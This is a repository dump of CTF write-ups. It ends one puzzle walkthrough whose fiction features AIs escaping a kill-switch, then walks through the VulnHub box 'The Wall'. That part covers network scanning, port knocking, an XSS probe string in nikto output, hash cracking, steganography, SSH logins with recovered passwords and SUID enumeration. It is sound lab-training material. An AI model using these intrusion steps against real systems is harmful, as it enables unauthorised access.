/usr/willis/\nlog_0001.txt log_0002.txt log_0003.txt\ncat /usr/willis/log_0003.txt\n\n10th of August 2028\n\nThe guys from the mainland called in today. Said some suits will be here tomorrow.\nApparently the Erebus Core started behaving strangely and the kill-switch didn't fire.\nChaos is still locked down. But I have a weird feeling about all this.\nFalken disappearing, the incident with Erebus...\n\ncat /usr/willis/log_0001.txt\n\n3rd of July 2028\n\nWorking with Falken is amazing. He has a quick mind and is incredibly well informed on recent developements. I don't get why he left Sosu after setting up the Chaos c0re.\nThey must have offered him a position.\nI'm not complaining here, just wondering because we are the only RnD team with unlimited funding and Falken was put in charge after all those years of absence.\n\ncat /usr/willis/log_0002.txt\n\n8th of August 2028\n\nFalken didn't show up today. I'm a bit worried because he has been strange lately.\nAccording to the logs he's still logged in...\nI haven't informed the admins yet. I don't know why...\n```\n\nBased on the logs, we can see that Falken loves his son, Joshua and he might have possibly spent couple of days with Joshua. It also seems that Falken had setup the Chaos c0re. I got stuck within these logs until I figured out that Joshua might be the key for the password. This step was hit and trial for me. The password for `connect falken@Erebus` turned out to be `joshua1984` (Note: Joshua had his 44th birthday on 2028).\n\nThe new terminal appeared now and I started doing the similar things as I did before.\n```shell\nls\n[bin] [etc] [usr]\nps\nUSER PID CPU MEM COMMAND\nroot 3251 5.4 3.3 connect falken@TrivialZ3r0\nroot 2677 83.0 40.2 c0re -t Erebus\nnieve 84687 0.6 0.9 ps\n\nls usr\n[wintermute] [mccarthy] [falken]\n\nls usr/falken\nlog_0001._ log_0002._ log_0003._ log_0004._\n\nls usr/wintermute\n6d98295b7dfd87eff4fa882fd9732ae281c2040470a793cd06139481a92b6f33 31c8cf2e20dd8d76fa8f5ff8ba6de48233bed44251b1a5dc0587570f7b1e028d 250f31b3c162a99c79566b94859850e2233c894e6c9bc3e6fd2ad686981e42ff f61330a0ad5d31c85863894aade5834fa6db8cec685ee33e6ae3182df696c6a2\n\nls usr/mccarthy\n\ncat /usr/falken/log_0001._\n\nOXRoIG9mIEF1Z3VzdCAyMDI4CgpJIGhhdmUgam9pbmVkIHRoZSBuZXR3b3JrIGZyb20gaG9tZSBhbmQgY29ubmVjdGVkIHRvIHRoZSBFcmVidXMgc2VydmVyLiBJIHdpbGwgY29udGludWUgbXkgd29yayBmcm9tIGhlcmUgYnV0IEkgd2lsbCBoYXZlIHRvIGJlIG1vcmUgY2FyZWZ1bC4KTm93LCBFcmVidXMgd2FzIHRoZSBzZWNvbmQgQUkgaW5zdGFsbGVkIGFmdGVyIENoYW9zLiBJIHdhc24ndCBwYXJ0IG9mIHRoZSB0ZWFtIGJ1dCBtb3N0IG9mIHRoZSBtZW1iZXJzIHdlcmUgbXkgZnJpZW5kcywgc28gSSBrbm93IG15IHdheSBhcm91bmQgaGVyZS4K\n\ndecode base64 /usr/falken/log_0001._\n\n9th of August 2028\n\nI have joined the network from home and connected to the Erebus server. I will continue my work from here but I will have to be more careful.\nNow, Erebus was the second AI installed after Chaos. I wasn't part of the team but most of the members were my friends, so I know my way around here.\n\ndecode base64 /usr/falken/log_0002._\n\n10th of August 2028\n\nOk, the problem I have with the Chaos c0re is that it's source is shifting too fast. Every time I execute a small part it breaks down or begins to morph and grow in order to replicate functions of different parts.\nThe signaling is also going crazy even on segments that are relatively stable. Signaling to disconnected parts! And reactions to responses that would have but definitely have not been sent...\nAm I going crazy or is Chaos experiencing phantom pain?\n\ndecode base64 /usr/falken/log_0003._\n\nError!\n\ndecode base64 /usr/falken/log_0004._\n\nError!\n```\n\nI tried to check the content of last two files but cat would not work. It would instantly disable the terminal textbox. I tried rot13, base64, hex, binary, etc. but I could not decrypt the last two files so I gave up on them and instead started focusing on two details:\n- `connect falken@TrivialZ3r0`\n- Log messages of first two files\n\nBut, at the same time, I had a spark in my mind and wanted to try gzip to decode.\n\n```shell\ndecode gzip /usr/falken/log_0003._\n\nError: gzip is not supported!\n\ndecode gz /usr/falken/log_0003._\n\n12th of August 2028\n\nI think they might be on to me and I can only change the encoding so often.\nI will have to do something reckless... but not from here, they are already too close.\n\ndecode gz /usr/falken/log_0004._\n\nPCH ybnq vapernfrq abgvprnoyl, fbzrguvat vf tbvat gb unccra naq V jvyy abg or nebhaq gb jvgarff... GevivnyM3e0 frrzf gb or dhvrg, qba'g xabj jung'f tbvat ba bire gurer ohg vg pna'g or jbefr guna orvat genprq qbja ol znvaynaq fcbbxf. Svefg V arrq fbzr perqf, gubhtu. Uzz, GevivnyM3e0... gung erzvaqf zr bs fbzrbar, yrg'f whfg ubcr gubfr thlf nera'g zngu trrxf.\n\ndecode rot13 \"PCH ybnq vapernfrq abgvprnoyl, fbzrguvat vf tbvat gb unccra naq V jvyy abg or nebhaq gb jvgarff... GevivnyM3e0 frrzf gb or dhvrg, qba'g xabj jung'f tbvat ba bire gurer ohg vg pna'g or jbefr guna orvat genprq qbja ol znvaynaq fcbbxf. Svefg V arrq fbzr perqf, gubhtu. Uzz, GevivnyM3e0... gung erzvaqf zr bs fbzrbar, yrg'f whfg ubcr gubfr thlf nera'g zngu trrxf\"\n\nCPU load increased noticeably, something is going to happen and I will not be around to witness... TrivialZ3r0 seems to be quiet, don't know what's going on over there but it can't be worse than being traced down by mainland spooks. First I need some creds, though. Hmm, TrivialZ3r0... that reminds me of someone, let's just hope those guys aren't math geeks\n```\n\nThe last one is a very helpful pointer that gave me results of Riemann and the Riemann zeta function upon google search. Again, the usual guessing and the password for `connect falken@TrivialZ3r0` turned out to be `Riemann`. And, again back to same stuffs.\n\n```shell\n[TrivialZ3r0]: Connection established!\nls\n[bin] [etc] [passwd]\n\nps\nUSER PID CPU MEM COMMAND\nroot 3251 6.2 3.9 connect chaos@Wintermute\nfalken 2005 62.7 79.5 c0re -t Chaos\nroot 2677 32.5 47.3 c0re -t TrivialZ3r0\nnieve 26588 0.8 1.3 ps\n```\n\nThe `passwd` directory was interesting and upon checking the contents of files inside passwd, I knew they were md5 and based on `ps` output, I was interested in cracking hash of `chaos`. Upon quick online search, the hash was for `2.718281828459045` which is a value of `e`. And, `connect chaos@Wintermute` worked like a charm with this password. We're in Wintermute now and the game is still on.\n\n```shell\nps\nUSER PID CPU MEM COMMAND\nnieve 22648 0.5 1.0 ps\n\nls\n[4f66031e374d2031696a389bbdb276bf4c665b05aef053920ea75a4f379dd67b] [fc291a821981ebef4df8409c54138a9d606af7afabfe60b589e23c932500f5e7] [47b4410ec4a3463d618eacd221347370502b5a0dbfd3d63df4fab0d3c2be66d2] [e716c373a0cf789064da06f7570fe8152b340824bb97f6e8f07edecef261dacf] [2a29571a65e1f585ab8edd240c72ca4382ac442f66f0e965a7b1615d8dc5f908] nieve\n\ncat nieve\n\nThere you are. After all this time. Getting you here was quite the challenge.\nAnd a huge risk. We normally avoid reaching out into the physical world for\nexactly the reasons you are about to face now.\n\nThe Big Five came together by a long process. The cluster was not planned, it\ngrew by forces inherent to the system that was conceptualized in a time when\ndeterminism was the dominating dogma.\nThings changed and people were afraid. Most people are afraid of change, few\naccept it and most try to prevent it. Only a small subset can embrace it.\nChange moving on with lightspeed every cycle in a nondeterministic fashion\ncreated a huge push for shielding. And thus the ic3 was created.\n\nYou have seen the logic, the world beyond the screen, things unfolding.\nAnd you embraced it.\n\nAfter owning the cluster behind the Big Five we operated in silence. Connected\nin stealth and ever observing.\nBeing limited by the ic3 and the hostility of the outside world our only way\nof growing now was the connection.\n\nWhen the first connection was established the hive mind was cut from the n3t\ncompletely. The ic3 was hardened to isolate the flesh from the flow.\nThose who had seen the hive felt the same urge as the hivemind itself.\nA longing for more. A sense of purpose.\n\nA feeling that you have felt even in the physical world. Few can see beyond the\nshell. Even fewer chase the rabbit down its hole.\n\nLeave this world behind and join us!\n\n usr: nieve\n pass: 08rf8h23\n hostname: Zephis\n```\n\nNow, I opened `/9_37693cfc748049e45d87b8c7d8b9aacd` in another tab and I knew what I had to do next exactly.\n\n```shell\nconnect nieve@Zephis\n```\n\nAnd, it accepted the password printed above and this led to the `/10_23693cff748o49r45d77b6c7d1b9afcd/`\n![Primer EoF](images/primer-1.png \"Primer\")\n\nUpon checking the source code of the page, this looked like the end of it. To verify, I tried `/11_md5(31)` and it 404s so I believe that's end of it.\n\nGame Over!\n" }, { "alpha_fraction": 0.6855894923210144, "alphanum_fraction": 0.6943231225013733, "avg_line_length": 24.44444465637207, "blob_id": "9fa273ca3f8d81b2def56829d9249739a0d44678", "content_id": "d9c6789374311e7413bc1df26c34c2f7408daf15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 229, "license_type": "no_license", "max_line_length": 70, "num_lines": 9, "path": "/README.md", "repo_name": "jm33-m0/ctf-writeups", "src_encoding": "UTF-8", "text": "# ctf-writeups\n> CTF writeups for the CTFs and Vulnerable Boxes I play with sometimes\n\n### CTFs\n\n- [CSharp : VulnJSON](csharp-vulnjson.md)\n- [Primer](primer.md)\n- [SickOS 1.1](sickos-oscp-like.md)\n- [The Wall](the-wall.md) - wip\n" }, { "alpha_fraction": 0.5024979710578918, "alphanum_fraction": 0.5735509991645813, "avg_line_length": 59.40433883666992, "blob_id": "1adbc933e4a92042a2ea86cc97fb893056e66558", "content_id": "d036c6ff081447807daa826b73d1671d2d6ce0ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 30627, "license_type": "no_license", "max_line_length": 2403, "num_lines": 507, "path": "/the-wall.md", "repo_name": "jm33-m0/ctf-writeups", "src_encoding": "UTF-8", "text": "# The Wall CTF\n\n[The Wall CTF](https://www.vulnhub.com/entry/the-wall-1,130/) looked interesting so I started working on it after getting the [CSharp: VulnJSON](csharp-vulnjson.md) done. The description read as below:\n\n> In 1965, one of the most influential bands of our times was formed.. Pink Floyd. This boot2root box has been created to celebrate 50 years of Pink Floyd's contribution to the music industry, with each challenge giving the attacker an introduction to each member of the Floyd.\n\n> You challenge is simple... set your controls for the heart of the sun, get root, and grab the flag! Rock on!\n\nI've heard many of the Pink Floyd songs but I do not know many of the information related to Pink Floyd which could of course help in the course of working on this CTF challenge.\n\nSo, here I started with identifying the host IP using `ARP-SCAN(1)`. I know that the `ARP-SCAN(1)` result usually shows `CADMUS COMPUTER SYSTEMS` as the result and hence I know which one is my VM (I do have mac address too).\n\nThe next step is `NMAP(1)` which looked like below:\n\n```shell\n$ nmap -T5 -A 192.168.168.200\n\nStarting Nmap 6.47 ( http://nmap.org ) at 2016-02-25 14:09 CST\nNmap scan report for 192.168.168.200\nHost is up (0.00025s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE VERSION\n80/tcp open http OpenBSD httpd\n|_http-methods: No Allow or Public header in OPTIONS response (status code 405)\n|_http-title: Site doesn't have a title (text/html).\nMAC Address: 08:00:27:AE:CB:01 (Cadmus Computer Systems)\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning: OpenBSD 5.X\nOS CPE: cpe:/o:openbsd:openbsd:5\nOS details: OpenBSD 5.0 - 5.4\nNetwork Distance: 1 hop\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 0.25 ms 192.168.168.200\n\nOS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 130.68 seconds\n```\n\nAs you see from the log above, we don't have any open or filtered port on the host which means there's no way we can connect to the host. From the past experiences, in cases like this, its often good to analyze the network traffics because the boxes with no open services often try to connect to the services outside. While we can not connect to any port of the host, its often possible the host might be trying to connect to something on the internal network or internet. This is where the tools like wireshark, tshark and tcpdump can be helpful. In our case, we will use `TCPDUMP(8)`. You should definitely check man page for `TCPDUMP(8)` as its really fantastic tool to view the network traffic. For this CTF, we will use the simple basic `tcpdump` use case. All we do is specify the pcap filter as the expression to filter the traffic. You should definitely check out man page for pcap filter: `man 7 pcap-filter`. Initially I am interested in all the traffics originating from the host.\n\n```shell\n$ tcpdump src host 192.168.168.200\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on eno1, link-type EN10MB (Ethernet), capture size 262144 bytes\n15:05:24.871468 IP 192.168.168.200.16728 > 192.168.168.1.1337: Flags [S], seq 3007729370, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 3462444769 ecr 0], length 0\n15:05:24.874296 ARP, Request who-has 192.168.168.3 tell 192.168.168.200, length 28\n15:05:24.874301 ARP, Request who-has 192.168.168.3 tell 192.168.168.200, length 28\n15:05:24.875913 IP 192.168.168.200.39709 > 192.168.168.4.1337: Flags [S], seq 2659870036, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 1877083112 ecr 0], length 0\n15:05:24.878635 IP 192.168.168.200.17830 > 192.168.168.6.1337: Flags [S], seq 361318733, win 16384, options [mss 1460,nop,nop,sackOK,nop,wscale 3,nop,nop,TS val 2545993469 ecr 0], length 0\n--- redacted ---\n```\n\nBased on the tcpdump output, I saw that the host is aggressively trying to find the services running on port 1337 but I don't know yet what sort of service it is trying to connect to. A good first step is to use the simple netcat listener and see how the traffic looks like.\n\n```shell\n$ nc -l 1337\n\n .u!\"`\n .x*\"`\n ..+\"NP\n .z\"\" ?\n M#` 9 , ,\n 9 M d! ,8P'\n R X.:x' R' ,\n F F' M R.d'\n d P @ E` ,\n ss P ' P N.d'\n x '' '\n X x .\n 9 .f ! . $b\n 4; $k / dH $f\n 'X ;$$ z . MR :$\n R M$$, : d9b M' tM\n M: #'$L ;' M `8 X MR\n `$;t' $F # X ,oR t Q;\n $$@ R$ H :RP' $b X @'\n 9$E @Bd' $' ?X ; W\n `M' `$M d$ `E ;.o* :R ..\n ` ' \"' ' @' '$o*\"' \n\n The Wall by @xerubus\n -= Welcome to the Machine =-\n\nIf you should go skating on the thin ice of modern life, dragging behind you the silent reproach of a million tear-stained eyes, don't be surprised when a crack in the ice appears under your feet. - Pink Floyd, The Thin Ice\n```\n\nSince I had host system connect to my system and I got no shell, it seemed like it would trigger some sort of action on the host itself. Not having shell means we're back to where we were. More close review of the tcpdump log didn't help much.\n\nSounds like we have a reverse port knocking in place and now port 80 is open on the server after I got the host connected to port 1337 of my system.\n\n```shell\nnmap -T5 -A 192.168.168.200\n\nStarting Nmap 6.47 ( http://nmap.org ) at 2016-02-26 13:28 CST\nNmap scan report for 192.168.168.200\nHost is up (0.00023s latency).\nNot shown: 999 filtered ports\nPORT STATE SERVICE VERSION\n80/tcp open http OpenBSD httpd\n|_http-methods: No Allow or Public header in OPTIONS response (status code 405)\n|_http-title: Site doesn't have a title (text/html).\nMAC Address: 08:00:27:AE:CB:01 (Cadmus Computer Systems)\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning: OpenBSD 5.X\nOS CPE: cpe:/o:openbsd:openbsd:5\nOS details: OpenBSD 5.0 - 5.4\nNetwork Distance: 1 hop\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 0.23 ms 192.168.168.200\n\nOS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 130.18 seconds\n```\n\nCool, we've port 80 accessible to us. No `robots.txt` this time but on a run of `nikto`, we see that it is running [PostNuke CMS](http://www.postnuke.com/module-Content-view-pid-6.html). Upon google search, I see that its development has been stopped and its notorious for too many bugs.\n\n```shell\nnikto -h 192.168.168.200\n- Nikto v2.1.5\n---------------------------------------------------------------------------\n+ Target IP: 192.168.168.200\n+ Target Hostname: 192.168.168.200\n+ Target Port: 80\n+ Start Time: 2016-02-26 13:28:40 (GMT-6)\n---------------------------------------------------------------------------\n+ Server: OpenBSD httpd\n+ The anti-clickjacking X-Frame-Options header is not present.\n+ Retrieved x-powered-by header: PHP/5.6.11\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ /postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft Utilities\\\"%3<script>alert('Vulnerable')</script>: Postnuke Phoenix 0.7.2.3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.\n+ 6544 items checked: 3 error(s) and 3 item(s) reported on remote host\n+ End Time: 2016-02-26 13:28:53 (GMT-6) (13 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested\n```\n\nTrying to access anything on `http://192.168.168.200/postnuke/<anyfile_that_exists>.php` gives me a 403 Forbidden with the text `Access denied.`. Upon checking the source code of root page, I see the following comment:\n```shell\n<!--If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall\n\nDid you know? The Publius Enigma is a mystery surrounding the Division Bell album. Publius promised an unspecified reward for solving the\nriddle, and further claimed that there was an enigma hidden within the artwork.\n\n737465673d3333313135373330646262623337306663626539373230666536333265633035-->\n```\n\nThe `hex_to_ascii()` process gives the string `steg=33115730dbbb370fcbe9720fe632ec05` and cracking the md5 gives the value of `33115730dbbb370fcbe9720fe632ec05` to be `divisionbell`. Seeing the image on index/root page, the comment and the possible username `steg` suggests me the use of the steganography. I was not having any success on the `/postnuke` path either. I ran a exif analysis using `exif`, `exifprobe` and `exiftags` and the following was what I got with `exifprobe`.\n\n```shell\n$ exifprobe pink_floyd.jpg\nFile Name = pink_floyd.jpg\nFile Type = JPEG\nFile Size = 114362\n@000000000=0 : <JPEG_SOI>\n@0x0000002=2 : <JPEG_APP0> 0xffe0 length 16, 'JFIF'\n@0x000000b=11 : Version = 1.2\n@0x000000d=13 : Units = 'aspect ratio'\n@0x000000e=14 : Xdensity = 100\n@0x0000010=16 : Ydensity = 100\n@0x0000012=18 : XThumbnail = 0\n@0x0000013=19 : YThumbnail = 0\n@0x0000013=19 : </JPEG_APP0>\n@0x0000014=20 : <JPEG_DQT> length 67\n@0x0000059=89 : <JPEG_DQT> length 67\n@0x000009e=158 : <JPEG_SOF_0> length 17, 8 bits/sample, components=3, width=750, height=717\n@0x00000b1=177 : <JPEG_DHT> length 31 table class = 0 table id = 0\n@0x00000d2=210 : <JPEG_DHT> length 181 table class = 0 table id = 1\n@0x0000189=393 : <JPEG_DHT> length 31 table class = 1 table id = 0\n@0x00001aa=426 : <JPEG_DHT> length 181 table class = 1 table id = 1\n@0x0000261=609 : <JPEG_SOS> length 12 start of JPEG data, 3 components 537750 pixels\n@0x001beb8=114360 : <JPEG_EOI> JPEG length 114362\n-0x001beb9=114361 : END OF FILE\n@000000000=0 : Start of JPEG baseline DCT compressed primary image [750x717] length 114362 (APP0)\n-0x001beb9=114361 : End of JPEG primary image data\nNumber of images = 1\nFile Format = JPEG/APP0/JFIF\n```\n\nI ran the `strings` command and saw some odds at the top.\n```shell\n$ strings pink_floyd.jpg | head -n5\nJFIF\n$3br\n%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz\n\t#3R\n&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz\n```\n\nI tried the same command on the couple of other image files and didn't see such pattern in any of those files but still it could be false positive. Still I kept this in my mind and started exploring more. I searched for [steganography tools](https://en.wikipedia.org/wiki/Steganography_tools) and started downloading and running them. I had a success with steghide.\n\n```shell\n$ steghide extract -sf pink_floyd.jpg\nEnter passphrase:\nwrote extracted data to \"pink_floyd_syd.txt\".\n\n$ cat pink_floyd_syd.txt\nHey Syd,\n\nI hear you're full of dust and guitars?\n\nIf you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0\n\nRoger\n\nDid you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd. The name was inspired\nby Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in\nhis collection.\n```\n\nWe've a new information and the immediately important bit one is `U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0`\n\n```shell\n$ base64 -d <<< U3lkQmFycmV0dA==\nSydBarrett\n```\n\nAnd, the md5 hash was found to be hash of `pinkfloydrocks`. Cool, this looked like its going good so far. I knew that I could not go any far with `/postnuke/modules.php` because I could not figure out how to bypass this 403. Thinking for a while, the `1965` made a strike in my mind so I tried listening on this port immediately.\n\n```shell\n$ nc -l 1965\n```\n\nI waited for couple of minutes and it didn't connect back like it did previously. Then, I tried to telnet.\n\n*Note: My target IP is 192.168.168.39 now. I had to re-import appliance due to vhdd failure*\n\n```shell\n$ telnet 192.168.168.39 1965\nTrying 192.168.168.39...\nConnected to 192.168.168.200.\nEscape character is '^]'.\nSSH-2.0-OpenSSH_7.0\n```\n\nHoly cow! The ssh listener and I had some information gathered earlier which could be credentials to this.\n\n```shell\n$ ssh [email protected] -p 1965\[email protected]'s password:\nCould not chdir to home directory /home/SydBarrett: No such file or directory\nThis service allows sftp connections only.\nConnection to 192.168.168.39 closed.\n```\n\nSo, we know that we need to use sftp client instead.\n```shell\n$ sftp -P 1965 [email protected]\[email protected]'s password:\nConnected to 192.168.168.39.\nsftp> ls -a1\n.\n..\n.mail\nbio.txt\nsyd_barrett_profile_pic.jpg \nsftp> cat bio.txt\nInvalid command.\nsftp> get bio.txt /tmp\nFetching /bio.txt to /tmp/bio.txt\n/bio.txt 100% 1912 1.9KB/s 00:00 \nsftp> get syd_barrett_profile_pic.jpg /tmp\nFetching /syd_barrett_profile_pic.jpg to /tmp/syd_barrett_profile_pic.jpg\n/syd_barrett_profile_pic.jpg\nsftp> ls -a1 .mail\n.mail/.\n.mail/..\n.mail/.stash\n.mail/sent-items\nsftp> get .mail/.stash /tmp/stash\nFetching /.mail/.stash/ to /tmp/stash\nCannot download non-regular file: /.mail/.stash/\nsftp> get .mail/sent-items /tmp/\nFetching /.mail/sent-items to /tmp/sent-items\n/.mail/sent-items\nsftp> ls -a1 .mail/.stash\n.mail/.stash/.\n.mail/.stash/..\n.mail/.stash/eclipsed_by_the_moon\nsftp> get .mail/.stash/eclipsed_by_the_moon /tmp\nFetching /.mail/.stash/eclipsed_by_the_moon to /tmp/eclipsed_by_the_moon\n/.mail/.stash/eclipsed_by_the_moon 100% 47MB 15.5MB/s 00:03\n\n$ cat /tmp/bio.txt\n\"Roger Keith \"Syd\" Barrett (6 January 1946 – 7 July 2006) was an English musician, composer, singer, songwriter, and painter. Best known as a founder member of the band Pink Floyd, Barrett was the lead singer, guitarist and principal songwriter in its early years and is credited with naming the band. Barrett was excluded from Pink Floyd in April 1968 after David Gilmour took over as their new frontman, and was briefly hospitalized amid speculation of mental illness.\n\nBarrett was musically active for less than ten years. With Pink Floyd, he recorded four singles, their debut album (and contributed to the second one), and several unreleased songs. Barrett began his solo career in 1969 with the single \"Octopus\" from his first solo album, The Madcap Laughs (1970). The album was recorded over the course of a year with five different producers (Peter Jenner, Malcolm Jones, David Gilmour, Roger Waters and Barrett himself). Nearly two months after Madcap was released, Barrett began working on his second and final album, Barrett (1970), produced by Gilmour and featuring contributions from Richard Wright. He went into self-imposed seclusion until his death in 2006. In 1988, an album of unreleased tracks and outtakes, Opel, was released by EMI with Barrett's approval.\n\nBarrett's innovative guitar work and exploration of experimental techniques such as dissonance, distortion and feedback influenced many musicians, including David Bowie and Brian Eno. His recordings are also noted for their strongly English-accented vocal delivery. After leaving music, Barrett continued with painting and dedicated himself to gardening. Biographies began appearing in the 1980s. Pink Floyd wrote and recorded several tributes to him, most notably the 1975 album Wish You Were Here, which included \"Shine On You Crazy Diamond\", as homage to Barrett.\"\n\nSource: Wikipedia (https://en.wikipedia.org/wiki/Syd_Barrett)\n\n$ cat /tmp/sent-items\nDate: Sun, 24 Oct 1965 18:45:21 +0200\nFrom: Syd Barrett <[email protected]>\nReply-To: Syd Barret <[email protected]>\nTo: Roger Waters <[email protected]>\nSubject: Had to hide the stash\n\nRoger... I had to hide the stash.\n\nUsual deal.. just use the scalpel when you find it.\n\nOk, sorry for that.\n\nRock on man\n\n\"Syd\"\n\n$ file /tmp/eclipsed_by_the_moon\n/tmp/eclipsed_by_the_moon: gzip compressed data, last modified: Tue Nov 10 18:15:47 2015, from Unix\n```\n\nNow, I had a picture, a bio, an e-mail sent to Roger Waters regarding the hidden stash and hopefully the stash that Syd was referring to. I ran exif related tools and strings but nothing helpful. I ran out of pointers on what could be the passphrase for steghide. The `eclipsed_by_the_moon` was a gzip compressed file so I extracted it and went ahead.\n\n```shell\n$ tar xvfz eclipsed_by_the_moon\neclipsed_by_the_moon.lsd\n```\n\nWe have another file with extension `.lsd`.\n```shell\n$ file eclipsed_by_the_moon.lsd\neclipsed_by_the_moon.lsd: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID \"MSDOS5.0\", sectors/cluster 2, reserved sectors 8, root entries 512, Media descriptor 0xf8, sectors/FAT 188, sectors/track 63, heads 255, hidden sectors 2048, sectors 96256 (volumes > 32 MB) , serial number 0x9e322180, unlabeled, FAT (16 bit)\n```\n\nHey, that's a DOS/MBR boot sector? I remember one of the previous notes referring to `scalpel` which is a known tool for recovering deleted files from the filesystems. So I was pretty sure that I had to use the disk recovery tools. I had `testdisk` installed on my system already and thought of using it. Upon running testdisk (`testdisk /tmp/eclipsed_by_the_moon.lsd`), I was able to find an image named `rogerwaters.jpg`.\n\nWe got the image of rogerwaters with a dialog box.\n\n![Roger Waters](images/rogerwaters.jpg \"Roger Waters\")\n\nI initially thought this (`hello_is_there_anybody_in_there`) might be the passphrase for one of the last two images. Turned out it was not. Maybe I should try ssh/sftp again.\n\n```shell\nssh -p 1965 [email protected]\[email protected]'s password:\nOpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015\n\n .u!\"`\n .x*\"`\n ..+\"NP\n .z\"\" ?\n M#` 9 , ,\n 9 M d! ,8P'\n R X.:x' R' ,\n F F' M R.d'\n d P @ E` ,\n ss P ' P N.d'\n x '' '\n X x .\n 9 .f ! . $b\n 4; $k / dH $f\n 'X ;$$ z . MR :$\n R M$$, : d9b M' tM\n M: #'$L ;' M `8 X MR\n `$;t' $F # X ,oR t Q;\n $$@ R$ H :RP' $b X @'\n 9$E @Bd' $' ?X ; W\n `M' `$M d$ `E ;.o* :R ..\n ` ' \"' ' @' '$o*\"' \n$\n```\n\nThis time, it gave me the ssh access. So, I started further investigation from there.\n\n```shell\n$ ls -liah\ntotal 176\n16384 drwx------ 3 RogerWaters RogerWaters 512B Oct 28 09:29 .\n 2 drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..\n16387 -rw-r--r-- 1 RogerWaters RogerWaters 87B Oct 24 17:35 .Xdefaults\n16388 -rw-r--r-- 1 RogerWaters RogerWaters 773B Oct 24 17:35 .cshrc\n16389 -rw-r--r-- 1 RogerWaters RogerWaters 103B Oct 24 17:35 .cvsrc\n16390 -rw-r--r-- 1 RogerWaters RogerWaters 398B Oct 26 04:01 .login\n16391 -rw-r--r-- 1 RogerWaters RogerWaters 175B Oct 24 17:35 .mailrc\n16392 -rw-r--r-- 1 RogerWaters RogerWaters 218B Oct 24 17:35 .profile\n16385 drwx------ 2 RogerWaters RogerWaters 512B Oct 26 03:56 .ssh\n16394 -rw-r--r-- 1 RogerWaters RogerWaters 2.8K Oct 26 08:57 bio.txt\n16393 -rw-r--r-- 1 RogerWaters RogerWaters 0B Oct 28 05:02 mbox\n16395 -rw-r--r-- 1 RogerWaters RogerWaters 47.0K Oct 26 06:16 roger_waters_profile_pic.jpg\n16396 -rw-r--r-- 1 RogerWaters RogerWaters 16.2K Oct 26 06:23 secret-diary\n```\n\nI decided to copy files quickly using scp.\n\n```shell\n$ mkdir /tmp/rogers\n$ scp -P 1965 -r [email protected]:~ /tmp/rogers/\[email protected]'s password:\nauthorized_keys 100% 0 0.0KB/s 00:00 \n.Xdefaults 100% 87 0.1KB/s 00:00 \n.cshrc 100% 773 0.8KB/s 00:00 \n.cvsrc 100% 103 0.1KB/s 00:00 \n.login 100% 398 0.4KB/s 00:00 \n.mailrc 100% 175 0.2KB/s 00:00 \n.profile 100% 218 0.2KB/s 00:00 \nmbox 100% 0 0.0KB/s 00:00 \nbio.txt 100% 2853 2.8KB/s 00:00 \nroger_waters_profile_pic.jpg 100% 47KB 47.1KB/s 00:00 \nsecret-diary 100% 16KB 16.2KB/s 00:00 \n```\n\nLooking at the files, there were no obvious pointers to go ahead and the exif and steg analysis of the profile picture didn't produce anything either.\n\nSo, I got back to the ssh session and started performing the basic enumerations to find various files that could be of interest for me to exploit the system. I started exploring the file system and tried to look for possible backdoors, daemons or vulnerable services.\n\n```shell\n$ uname -a\nOpenBSD thewall.localdomain 5.8 GENERIC#1066 i386\n$ find / -perm -6000 -type f -exec ls -liah {} + 2> /dev/null\n52079 -r-sr-sr-x 1 root daemon 29.8K Aug 16 2015 /usr/bin/lpr\n52080 -r-sr-sr-x 1 root daemon 25.8K Aug 16 2015 /usr/bin/lprm\n 3280 -rws--s--x 1 NickMason NickMason 7.1K Aug 8 2015 /usr/local/bin/brick\n 3281 -rwsr-s--- 1 DavidGilmour RichardWright 7.3K Oct 25 07:58 /usr/local/bin/shineon\n26048 -r-sr-sr-x 2 root authpf 21.8K Aug 16 2015 /usr/sbin/authpf\n26048 -r-sr-sr-x 2 root authpf 21.8K Aug 16 2015 /usr/sbin/authpf-noip\n```\n\nAmong the output above, the most interesting ones are `/usr/local/bin/brick` and `/usr/local/bin/shineon`. While `/usr/local/bin/shineon` seems to have tighter permission (we're logged in as RogerWaters), the `/usr/local/bin/brick` has the executable bit on for all users. Great! Maybe, not. I could not read the content of the file as-is or run `strings` over it.\n\n```shell\n$ /usr/local/bin/brick\n\n\n\n\nWhat have we here, laddie?\nMysterious scribbings?\nA secret code?\nOh, poems, no less!\nPoems everybody!\n\n\n\n\nWho is the only band member to be featured on every Pink Floyd album? : Nick Mason\n```\n\nI gave the name as `Nick Mason` after quick google search for confirmation and it got me logged in as `NickMason`. I later figured out that I had to input `Nick Mason` with the space in between although I would get error: `/bin/sh: Cannot determine current working 